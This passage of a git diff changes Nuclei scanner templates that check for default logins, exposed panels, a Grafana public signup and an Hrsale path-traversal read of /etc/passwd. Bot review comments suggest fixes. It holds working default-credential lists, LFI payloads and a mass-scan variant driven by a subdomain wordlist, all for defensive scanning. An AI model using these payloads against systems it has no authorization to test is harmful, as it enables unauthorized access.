@@ -43,4 +51,6 @@ requests: - "contains(tolower(all_headers), 'location: /')" - "contains(tolower(all_headers), 'gophish')" - "status_code==302" - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/gophish-default-login-7793.yaml b/poc/auth/gophish-default-login-7793.yaml index 2bea18c8ad..9b2b924bb1 100644 --- a/poc/auth/gophish-default-login-7793.yaml +++ b/poc/auth/gophish-default-login-7793.yaml @@ -1,33 +1,31 @@ id: gophish-default-login + info: - name: Gophish < v0.10.1 Default Credentials + name: Gophish < v0.10.1 default credentials author: arcc,dhiyaneshDK severity: high - description: For versions of Gophish > 0.10.1, the temporary administrator credentials are printed in the logs when you first execute the Gophish binary. - reference: - - https://docs.getgophish.com/user-guide/getting-started - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: gophish,default-login + requests: - raw: - | GET /login HTTP/1.1 Host: {{Hostname}} + - | POST /login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username={{user}}&password={{pass}}&csrf_token={{replace(url_encode(html_unescape(csrf_token)), "+", "%2B")}} + attack: pitchfork payloads: user: - admin pass: - gophish + cookie-reuse: true extractors: - type: regex @@ -37,6 +35,7 @@ requests: group: 1 regex: - 'name="csrf_token" value="(.+?)"' + matchers: - type: dsl dsl: @@ -44,6 +43,4 @@ requests: - "contains(tolower(all_headers), 'location: /')" - "contains(tolower(all_headers), 'gophish')" - "status_code==302" - condition: and - -# Enhanced by mp on 2022/03/10 + condition: and \ No newline at end of file diff --git a/poc/auth/gophish-login-7795.yaml b/poc/auth/gophish-login-7795.yaml deleted file mode 100644 index bedbfc9976..0000000000 --- a/poc/auth/gophish-login-7795.yaml +++ /dev/null 
@@ -1,20 +0,0 @@ -id: gophish-login -info: - name: Gophish Login - author: dhiyaneshDK - severity: info - tags: panel,gophish - metadata: - shodan-query: http.title:"Gophish - Login" -requests: - - method: GET - path: - - '{{BaseURL}}/login' - matchers-condition: and - matchers: - - type: word - words: - - 'Gophish - Login' - - type: status - status: - - 200 diff --git a/poc/auth/gophish-login-7796.yaml b/poc/auth/gophish-login-7796.yaml new file mode 100644 index 0000000000..e35d98a093 --- /dev/null +++ b/poc/auth/gophish-login-7796.yaml @@ -0,0 +1,23 @@ +id: gophish-login + +info: + name: Gophish Login + author: dhiyaneshDK + severity: info + metadata: + shodan-query: http.title:"Gophish - Login" + tags: panel,gophish + +requests: + - method: GET + path: + - '{{BaseURL}}/login' + + matchers-condition: and + matchers: + - type: word + words: + - 'Gophish - Login' + - type: status + status: + - 200 diff --git a/poc/auth/grafana-public-signup-7814.yaml b/poc/auth/grafana-public-signup-7814.yaml new file mode 100644 index 0000000000..bfdeddc6ae --- /dev/null +++ b/poc/auth/grafana-public-signup-7814.yaml @@ -0,0 +1,30 @@ +id: grafana-public-signup +info: + name: Grafana Public Signup + author: pdteam + severity: medium + tags: grafana,intrusive +requests: + - raw: + - | + POST /api/user/signup/step2 HTTP/1.1 + Host: {{Hostname}} + content-type: application/json + Origin: {{BaseURL}} + Referer: {{BaseURL}} + + {"username":"nuclei_{{randstr}}","password":"{{randstr_1}}"} + matchers-condition: and + matchers: + - type: word + words: + - "User sign up completed successfully" + - type: word + words: + - "grafana_sess" + - "grafana_user" + condition: and + part: header + - type: status + status: + - 200 diff --git a/poc/auth/grafana-public-signup.yaml b/poc/auth/grafana-public-signup.yaml index 50139cdbdc..57e0bcc038 100644 --- a/poc/auth/grafana-public-signup.yaml +++ b/poc/auth/grafana-public-signup.yaml 
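Review bot: `grafana-public-signup-7814.yaml` registers a real account on every instance it matches, and its `info` block has no `description` telling the operator so. I would add `description: Grafana allows unauthenticated self-registration; a match means this template created an account named nuclei_<random> that should be deleted afterwards.` next to the existing `intrusive` tag. The `nuclei_` prefix in the username is worth keeping for that cleanup. The copy in `grafana-public-signup.yaml` in the next file section uses a bare `{{randstr}}`, which is harder to find later.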
@@ -1,15 +1,10 @@ id: grafana-public-signup - info: name: Grafana Public Signup author: pdteam severity: medium - metadata: - max-request: 1 - shodan-query: title:"Grafana" - tags: grafana,intrusive,misconfig - -http: + tags: grafana,intrusive +requests: - raw: - | POST /api/user/signup/step2 HTTP/1.1 @@ -19,22 +14,17 @@ http: Referer: {{BaseURL}} {"username":"{{randstr}}","password":"{{randstr_1}}"} - matchers-condition: and matchers: - type: word words: - "User sign up completed successfully" - - type: word words: - "grafana_sess" - "grafana_user" condition: and part: header - - type: status status: - 200 - -# digest: 4a0a004730450221008d17e057471dcda3505467d05d41aa5c32db96f2146ca1c43f7a88beae3584c002207709b004fd68285d4ffa9bfb6ea1af8301a483730ea986f3b7ee046ed8301eed:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/guacamole-default-login-7858.yaml b/poc/auth/guacamole-default-login-7858.yaml index 9f657da78c..98f19dbabb 100644 --- a/poc/auth/guacamole-default-login-7858.yaml +++ b/poc/auth/guacamole-default-login-7858.yaml @@ -4,16 +4,18 @@ info: name: Guacamole Default Login author: r3dg33k severity: high - tags: guacamole,default-login description: Guacamole default admin login credentials were detected. - reference: https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22 + reference: + - https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 - cve-id: cwe-id: CWE-522 + metadata: + max-request: 1 + tags: guacamole,default-login -requests: +http: - raw: - | POST /api/tokens HTTP/1.1 @@ -49,4 +51,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/03/10 +# digest: 4a0a00473045022017cbd9a577da9580b25601a92ca12140aba01cfa155139b4b528662bc2683310022100b8847255257f8cfbb5b9ff4b8dbdf20108a739013991804e002d822b45589c6b:922c64590222798bb761d5b6d8e72950 
diff --git a/poc/auth/guacamole-default-login-7859.yaml b/poc/auth/guacamole-default-login-7859.yaml new file mode 100644 index 0000000000..4a296c20ba --- /dev/null +++ b/poc/auth/guacamole-default-login-7859.yaml @@ -0,0 +1,38 @@ +id: guacamole-default-login +info: + name: Guacamole Default Login + author: r3dg33k + severity: high + tags: guacamole,default-login + reference: https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22. +requests: + - raw: + - | + POST /api/tokens HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Origin: {{Hostname}} + Referer: {{Hostname}} + + username={{username}}&password={{password}} + payloads: + username: + - guacadmin + password: + - guacadmin + attack: pitchfork + matchers-condition: and + matchers: + - type: word + words: + - '"username"' + - '"authToken"' + - '"guacadmin"' + condition: and + - type: word + words: + - 'application/json' + part: header + - type: status + status: + - 200 diff --git a/poc/auth/guacamole-default-login-7861.yaml b/poc/auth/guacamole-default-login-7861.yaml index 4a296c20ba..8517bac93a 100644 --- a/poc/auth/guacamole-default-login-7861.yaml +++ b/poc/auth/guacamole-default-login-7861.yaml @@ -3,8 +3,14 @@ info: name: Guacamole Default Login author: r3dg33k severity: high + description: Guacamole default admin login credentials were detected. + reference: + - https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: guacamole,default-login - reference: https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22. requests: - raw: - | @@ -36,3 +42,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 
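Review bot: In the new `guacamole-default-login-7859.yaml` the request sets `Origin: {{Hostname}}` and `Referer: {{Hostname}}`, which gives a bare host without a scheme. A server or proxy that validates these headers may reject the login, and the template would then miss a live default account. Other templates in this commit use `Origin: {{BaseURL}}` and `Referer: {{BaseURL}}`, and the same two lines fit here. The file also lacks the `description` and `classification` that the `-7861` copy gains in the following file section.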
diff --git a/poc/auth/hivemanager-login-panel-7966.yaml b/poc/auth/hivemanager-login-panel-7966.yaml index 6dd5bdedc9..a4da86dd2b 100644 --- a/poc/auth/hivemanager-login-panel-7966.yaml +++ b/poc/auth/hivemanager-login-panel-7966.yaml @@ -1,10 +1,9 @@ id: hivemanager-login-panel - info: name: HiveManager Login panel author: binaryfigments severity: info - tags: panel,hivemanager,login + tags: panel requests: - method: GET diff --git a/poc/auth/hongdian-default-login-7997.yaml b/poc/auth/hongdian-default-login-7997.yaml new file mode 100644 index 0000000000..1ca17e5a22 --- /dev/null +++ b/poc/auth/hongdian-default-login-7997.yaml @@ -0,0 +1,58 @@ +id: hongdian-default-login + +info: + name: Hongdian Default Login + author: gy741 + severity: high + description: Hongdian default login information was detected. + tags: hongdian,default-login + reference: + - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + + payloads: + username: + - guest + - admin + password: + - guest + - admin + attack: pitchfork + + matchers-condition: and + matchers: + - type: word + words: + - "text/html" + part: header + + - type: word + words: + - "status_main.cgi" + part: body + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/10 
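Review bot: The two raw requests in `hongdian-default-login-7997.yaml` are byte-for-byte the same `GET /` with the same Basic `Authorization` header, so each credential pair is sent twice. That doubles the login attempts against the device, which matters where lockout is enabled, and adds no detection value. One request block is enough, since the pitchfork payloads already pair guest/guest and admin/admin. The empty `cve-id:` key under `classification` can be removed as well.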
diff --git a/poc/auth/hongdian-default-login-7999.yaml b/poc/auth/hongdian-default-login-7999.yaml deleted file mode 100644 index 5a07adb98f..0000000000 --- a/poc/auth/hongdian-default-login-7999.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: hongdian-default-login -info: - name: Hongdian Default Login - author: gy741 - severity: high - description: Hongdian default login information was detected. - reference: - - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: hongdian,default-login -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - payloads: - username: - - guest - - admin - password: - - guest - - admin - attack: pitchfork - matchers-condition: and - matchers: - - type: word - words: - - "text/html" - part: header - - type: word - words: - - "status_main.cgi" - part: body - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/hp-ilo-serial-key-disclosure-8023.yaml b/poc/auth/hp-ilo-serial-key-disclosure-8023.yaml deleted file mode 100644 index 61bddf3680..0000000000 --- a/poc/auth/hp-ilo-serial-key-disclosure-8023.yaml +++ /dev/null 
@@ -1,24 +0,0 @@ -id: hp-ilo-serial-key-disclosure -info: - name: HP ILO Serial Key Disclosure - author: dhiyaneshDk - severity: medium - reference: - - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/hp-ilo-serial-key-disclosure.json - tags: exposure,config -requests: - - method: GET - path: - - "{{BaseURL}}/xmldata?item=CpqKey" - matchers-condition: and - matchers: - - type: word - words: - - "LTYPE" - - "LNAME" - - "KEY" - part: body - condition: and - - type: status - status: - - 200 diff --git a/poc/auth/hp-ilo-serial-key-disclosure-8025.yaml b/poc/auth/hp-ilo-serial-key-disclosure-8025.yaml new file mode 100644 index 0000000000..60989a2210 --- /dev/null +++ b/poc/auth/hp-ilo-serial-key-disclosure-8025.yaml @@ -0,0 +1,27 @@ +id: hp-ilo-serial-key-disclosure + +info: + name: HP ILO Serial Key Disclosure + author: dhiyaneshDk + severity: medium + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/hp-ilo-serial-key-disclosure.json + tags: exposure,config + +requests: + - method: GET + path: + - "{{BaseURL}}/xmldata?item=CpqKey" + + matchers-condition: and + matchers: + - type: word + words: + - "LTYPE" + - "LNAME" + - "KEY" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/poc/auth/hp-ilo-serial-key-disclosure.yaml b/poc/auth/hp-ilo-serial-key-disclosure.yaml index 60989a2210..61bddf3680 100644 --- a/poc/auth/hp-ilo-serial-key-disclosure.yaml +++ b/poc/auth/hp-ilo-serial-key-disclosure.yaml 
@@ -1,17 +1,15 @@ id: hp-ilo-serial-key-disclosure - info: name: HP ILO Serial Key Disclosure author: dhiyaneshDk severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/hp-ilo-serial-key-disclosure.json + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/hp-ilo-serial-key-disclosure.json tags: exposure,config - requests: - method: GET path: - "{{BaseURL}}/xmldata?item=CpqKey" - matchers-condition: and matchers: - type: word @@ -21,7 +19,6 @@ requests: - "KEY" part: body condition: and - - type: status status: - 200 diff --git a/poc/auth/hpe-system-management-login-8017.yaml b/poc/auth/hpe-system-management-login-8017.yaml new file mode 100644 index 0000000000..2d004eb29d --- /dev/null +++ b/poc/auth/hpe-system-management-login-8017.yaml @@ -0,0 +1,27 @@ +id: hpe-system-management-login + +info: + name: HPE System Management Login + author: divya_mudgal + severity: info + tags: hpe,tech,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/cpqlogin.htm" + + matchers-condition: and + matchers: + - type: word + condition: and + part: body + words: + - "HPE System Management Homepage" + - "/proxy/ssllogin" + + extractors: + - type: regex + part: body + regex: + - "HPE System Management Homepage v([0-9-.]*)" diff --git a/poc/auth/hpe-system-management-login.yaml b/poc/auth/hpe-system-management-login.yaml index 2d004eb29d..121d8ea019 100644 --- a/poc/auth/hpe-system-management-login.yaml +++ b/poc/auth/hpe-system-management-login.yaml 
@@ -1,12 +1,19 @@ id: hpe-system-management-login info: - name: HPE System Management Login + name: Hewlett Packard Enterprise System Management Login Panel - Detect author: divya_mudgal severity: info + description: Hewlett Packard Enterprise System Management login page was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 tags: hpe,tech,panel -requests: +http: - method: GET path: - "{{BaseURL}}/cpqlogin.htm" @@ -25,3 +32,5 @@ requests: part: body regex: - "HPE System Management Homepage v([0-9-.]*)" + +# digest: 4a0a004730450221008648c60f77f9fa87ed068d9cdd3c2d6459a018e00679356f649dd00438673fe202207b6a8884b30e6e4df0db104e9306c0326edaf21a5d6af32afb5797a8c969e6ad:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/hrsale-unauthenticated-lfi-8039.yaml b/poc/auth/hrsale-unauthenticated-lfi-8039.yaml index ab6e547134..c30bf2123a 100644 --- a/poc/auth/hrsale-unauthenticated-lfi-8039.yaml +++ b/poc/auth/hrsale-unauthenticated-lfi-8039.yaml 
@@ -1,33 +1,20 @@ id: hrsale-unauthenticated-lfi - info: - name: Hrsale 2.0.0 - Local File Inclusion + name: Hrsale 2.0.0 - Hrsale Unauthenticated Lfi author: 0x_Akoko severity: high - description: Hrsale 2.0.0 is vulnerable to local file inclusion. This exploit allow you to download any readable file from server without permission and login session - reference: - - https://www.exploit-db.com/exploits/48920 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - metadata: - max-request: 1 - tags: hrsale,lfi,edb - -http: + description: This exploit allow you to download any readable file from server without permission and login session + reference: https://www.exploit-db.com/exploits/48920 + tags: hrsale,lfi +requests: - method: GET path: - "{{BaseURL}}/download?type=files&filename=../../../../../../../../etc/passwd" - matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 - -# digest: 4a0a0047304502205d8da26caa1f9a6e6bed6ce5438954cd3ae937fa03b8cebf06f5ae4b9b3107c70221008d7fff0fdaa8d82a6706618fcf4b82ae6e5b708d220e5516d0f3a7f2481969e3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/hrsale-unauthenticated-lfi-8041.yaml b/poc/auth/hrsale-unauthenticated-lfi-8041.yaml index d335ea1fcf..ab6e547134 100644 --- a/poc/auth/hrsale-unauthenticated-lfi-8041.yaml +++ b/poc/auth/hrsale-unauthenticated-lfi-8041.yaml @@ -11,16 +11,17 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: hrsale,lfi + metadata: + max-request: 1 + tags: hrsale,lfi,edb -requests: +http: - method: GET path: - "{{BaseURL}}/download?type=files&filename=../../../../../../../../etc/passwd" matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" 
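Review bot: The first hunk here strips the `classification` block (`cwe-id: CWE-22`, `cvss-score: 7.5`) from `hrsale-unauthenticated-lfi-8039.yaml` and renames the check to `Hrsale 2.0.0 - Hrsale Unauthenticated Lfi`. The `-8041` copy in the next file section keeps that metadata, so two files with the same `id` now report the same finding with different detail. I would keep `name: Hrsale 2.0.0 - Local File Inclusion` and the three classification lines in both copies. The remaining description should read "This exploit allows you to download any readable file from the server without permission or a login session."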
@@ -29,4 +30,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/08/03 +# digest: 4a0a0047304502205d8da26caa1f9a6e6bed6ce5438954cd3ae937fa03b8cebf06f5ae4b9b3107c70221008d7fff0fdaa8d82a6706618fcf4b82ae6e5b708d220e5516d0f3a7f2481969e3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/htpasswd-detection-8046.yaml b/poc/auth/htpasswd-detection-8046.yaml new file mode 100644 index 0000000000..e3ac389f7e --- /dev/null +++ b/poc/auth/htpasswd-detection-8046.yaml @@ -0,0 +1,25 @@ +id: htpasswd + +info: + name: Detect exposed .htpasswd files + author: geeknik + severity: info + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/.htpasswd" + + matchers-condition: and + matchers: + - type: word + words: + - ":{SHA}" + - ":$apr1$" + - ":$2y$" + condition: or + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/auth/http-etcd-unauthenticated-api-data-leak-8056.yaml b/poc/auth/http-etcd-unauthenticated-api-data-leak-8056.yaml deleted file mode 100644 index 1c523c0a06..0000000000 --- a/poc/auth/http-etcd-unauthenticated-api-data-leak-8056.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: http-etcd-unauthenticated-api-data-leak -info: - name: etcd Unauthenticated HTTP API Leak - author: dhiyaneshDk - severity: high - reference: https://hackerone.com/reports/1088429 - tags: unauth -requests: - - method: GET - path: - - "{{BaseURL}}/v2/auth/roles" - matchers-condition: and - matchers: - - type: word - words: - - '"roles"' - - '"permissions"' - - '"role"' - - '"kv"' - condition: and - part: body - - type: status - status: - - 200 - - type: word - part: header - words: - - "text/plain" diff --git a/poc/auth/http-etcd-unauthenticated-api-data-leak.yaml b/poc/auth/http-etcd-unauthenticated-api-data-leak.yaml new file mode 100644 index 0000000000..ba35991570 --- /dev/null +++ b/poc/auth/http-etcd-unauthenticated-api-data-leak.yaml 
@@ -0,0 +1,38 @@ +id: http-etcd-unauthenticated-api-data-leak + +info: + name: etcd Unauthenticated HTTP API Leak + author: dhiyaneshDk + severity: high + reference: https://hackerone.com/reports/1088429 + tags: unauth + +requests: + - payloads: + Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt + attack: sniper + threads: 100 + + raw: + - | + GET /v2/auth/roles HTTP/1.1 + Host: {{Subdomains}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept-Encoding: gzip, deflate + matchers-condition: and + matchers: + - type: word + words: + - '"roles"' + - '"permissions"' + - '"role"' + - '"kv"' + condition: and + part: body + - type: status + status: + - 200 + - type: word + part: header + words: + - "text/plain" diff --git a/poc/auth/huawei-HG532e-default-router-login.yaml b/poc/auth/huawei-HG532e-default-router-login.yaml deleted file mode 100644 index 2ebc7ab348..0000000000 --- a/poc/auth/huawei-HG532e-default-router-login.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: huawei-HG532e-default-login -info: - name: Huawei HG532e Default Credential - description: Huawei HG532e default admin credentials were discovered. - author: pussycat0x - severity: high - metadata: - shodan-query: http.html:"HG532e" - tags: default-login,huawei - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 -requests: - - raw: - - | - POST /index/login.cgi HTTP/1.1 - Host: {{Hostname}} - Cookie: Language=en; FirstMenu=Admin_0; SecondMenu=Admin_0_0; ThirdMenu=Admin_0_0_0 - Content-Type: application/x-www-form-urlencoded - - Username=user&Password=MDRmODk5NmRhNzYzYjdhOTY5YjEwMjhlZTMwMDc1NjllYWYzYTYzNTQ4NmRkYWIyMTFkNTEyYzg1YjlkZjhmYg%3D%3D - matchers-condition: and - matchers: - - type: word - part: header - words: - - 'Set-Cookie: SessionID' - - type: word - part: body - words: - - "replace" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/10 
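Review bot: The `payloads` entry `Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt` in the new `http-etcd-unauthenticated-api-data-leak.yaml` points at a file on the author's machine, so it will not resolve on any other system. In addition, `Host: {{Subdomains}}` with `threads: 100` takes the Host header from that list instead of from the target the scan was given. A template in a shared corpus should test only the supplied target. The version deleted in the file section just before this one did that with `- method: GET`, `path:` and `- "{{BaseURL}}/v2/auth/roles"`, and the matchers can stay as they are. The hard-coded browser `User-Agent` line is unnecessary as well.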
diff --git a/poc/auth/huawei-hg532e-default-router-login-8063.yaml b/poc/auth/huawei-hg532e-default-router-login-8063.yaml index e29e927d84..2ebc7ab348 100644 --- a/poc/auth/huawei-hg532e-default-router-login-8063.yaml +++ b/poc/auth/huawei-hg532e-default-router-login-8063.yaml @@ -1,16 +1,17 @@ id: huawei-HG532e-default-login info: name: Huawei HG532e Default Credential + description: Huawei HG532e default admin credentials were discovered. author: pussycat0x severity: high - description: Huawei HG532e default admin credentials were discovered. + metadata: + shodan-query: http.html:"HG532e" + tags: default-login,huawei classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - shodan-query: http.html:"HG532e" - tags: default-login,huawei requests: - raw: - | diff --git a/poc/auth/huawei-router-auth-bypass-8073.yaml b/poc/auth/huawei-router-auth-bypass-8073.yaml index 4ad8b9d364..ec8c041750 100644 --- a/poc/auth/huawei-router-auth-bypass-8073.yaml +++ b/poc/auth/huawei-router-auth-bypass-8073.yaml 
@@ -1,27 +1,39 @@ id: huawei-router-auth-bypass + info: - name: Huawei Router Authentication Bypass + name: Huawei Router - Authentication Bypass author: gy741 severity: critical - description: The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device. + description: Huawei Routers are vulnerable to authentication bypass because the default password of this router is the last 8 characters of the device's serial number which exist on the back of the device. reference: - https://www.exploit-db.com/exploits/48310 - tags: huawei,auth-bypass,router -requests: + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-288 + metadata: + max-request: 1 + tags: auth-bypass,router,edb,huawei + +http: - raw: - | GET /api/system/deviceinfo HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 Referer: {{BaseURL}} + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "DeviceName" - "SerialNumber" - "HardwareVersion" condition: and + +# digest: 4a0a00473045022100dad2e64cfe1e58f0bad69d1da6ede13447ad1a58f60e8dcb50a1946e8980e63f02203a2282329ce371bf8d213ace5f75e364d5d78dc0dd505b85474bbee7babe5447:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/huawei-router-auth-bypass-8076.yaml b/poc/auth/huawei-router-auth-bypass-8076.yaml new file mode 100644 index 0000000000..bde5f950f6 --- /dev/null +++ b/poc/auth/huawei-router-auth-bypass-8076.yaml 
@@ -0,0 +1,37 @@
+id: huawei-router-auth-bypass
+
+info:
+ name: Huawei Router - Authentication Bypass
+ author: gy741
+ severity: critical
+ description: Huawei Routers are vulnerable to authentication bypass because the default password of this router is the last 8 characters of the device's serial number which exist on the back of the device.
+ reference:
+ - https://www.exploit-db.com/exploits/48310
+ classification:
+ cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.0
+ cwe-id: CWE-288
+ tags: huawei,auth-bypass,router
+
+requests:
+ - raw:
+ - |
+ GET /api/system/deviceinfo HTTP/1.1
+ Host: {{Hostname}}
+ Accept: application/json, text/javascript, */*; q=0.01
+ Referer: {{BaseURL}}
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "DeviceName"
+ - "SerialNumber"
+ - "HardwareVersion"
+ condition: and
+
+# Enhanced by mp on 2022/06/03
diff --git a/poc/auth/hue-default-credential-8080.yaml b/poc/auth/hue-default-credential-8080.yaml
index 44b2307cb8..71dcb8de6a 100644
--- a/poc/auth/hue-default-credential-8080.yaml
+++ b/poc/auth/hue-default-credential-8080.yaml
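Review bot: `cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H` in the new `huawei-router-auth-bypass-8076.yaml` is not a valid vector, because the prefix is the CVSS version and not the score. Tooling that parses the vector is likely to reject or mis-score it. The `-8073` copy updated in the previous file section has `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H` with `cvss-score: 10`, and this file should use the same line. The description could also state what the matcher actually shows, namely that `/api/system/deviceinfo` returns the serial number to an unauthenticated request.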
@@ -1,33 +1,29 @@ id: hue-default-credential - info: name: Cloudera Hue Default Admin Login author: For3stCo1d severity: high description: Cloudera Hue default admin credentials were discovered. - reference: https://github.com/cloudera/hue - metadata: - shodan-query: title:"Hue - Welcome to Hue" + reference: + - https://github.com/cloudera/hue classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 - cve-id: cwe-id: CWE-522 + metadata: + shodan-query: title:"Hue - Welcome to Hue" tags: hue,default-login,oss,cloudera - requests: - raw: - | GET /hue/accounts/login?next=/ HTTP/1.1 Host: {{Hostname}} - - | POST /hue/accounts/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username={{user}}&password={{pass}}&next=%2F - attack: pitchfork payloads: user: @@ -35,13 +31,11 @@ requests: - hue - hadoop - cloudera - pass: - admin - hue - hadoop - cloudera - cookie-reuse: true extractors: - type: regex @@ -51,7 +45,6 @@ requests: group: 1 regex: - name='csrfmiddlewaretoken' value='(.+?)' - req-condition: true stop-at-first-match: true matchers-condition: and @@ -62,7 +55,6 @@ requests: - contains(tolower(all_headers_2), 'csrftoken=') - contains(tolower(all_headers_2), 'sessionid=') condition: and - - type: status status: - 302 diff --git a/poc/auth/hue-default-credential-8081.yaml b/poc/auth/hue-default-credential-8081.yaml deleted file mode 100644 index 71dcb8de6a..0000000000 --- a/poc/auth/hue-default-credential-8081.yaml +++ /dev/null 
@@ -1,62 +0,0 @@ -id: hue-default-credential -info: - name: Cloudera Hue Default Admin Login - author: For3stCo1d - severity: high - description: Cloudera Hue default admin credentials were discovered. - reference: - - https://github.com/cloudera/hue - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - shodan-query: title:"Hue - Welcome to Hue" - tags: hue,default-login,oss,cloudera -requests: - - raw: - - | - GET /hue/accounts/login?next=/ HTTP/1.1 - Host: {{Hostname}} - - | - POST /hue/accounts/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username={{user}}&password={{pass}}&next=%2F - attack: pitchfork - payloads: - user: - - admin - - hue - - hadoop - - cloudera - pass: - - admin - - hue - - hadoop - - cloudera - cookie-reuse: true - extractors: - - type: regex - name: csrfmiddlewaretoken - part: body - internal: true - group: 1 - regex: - - 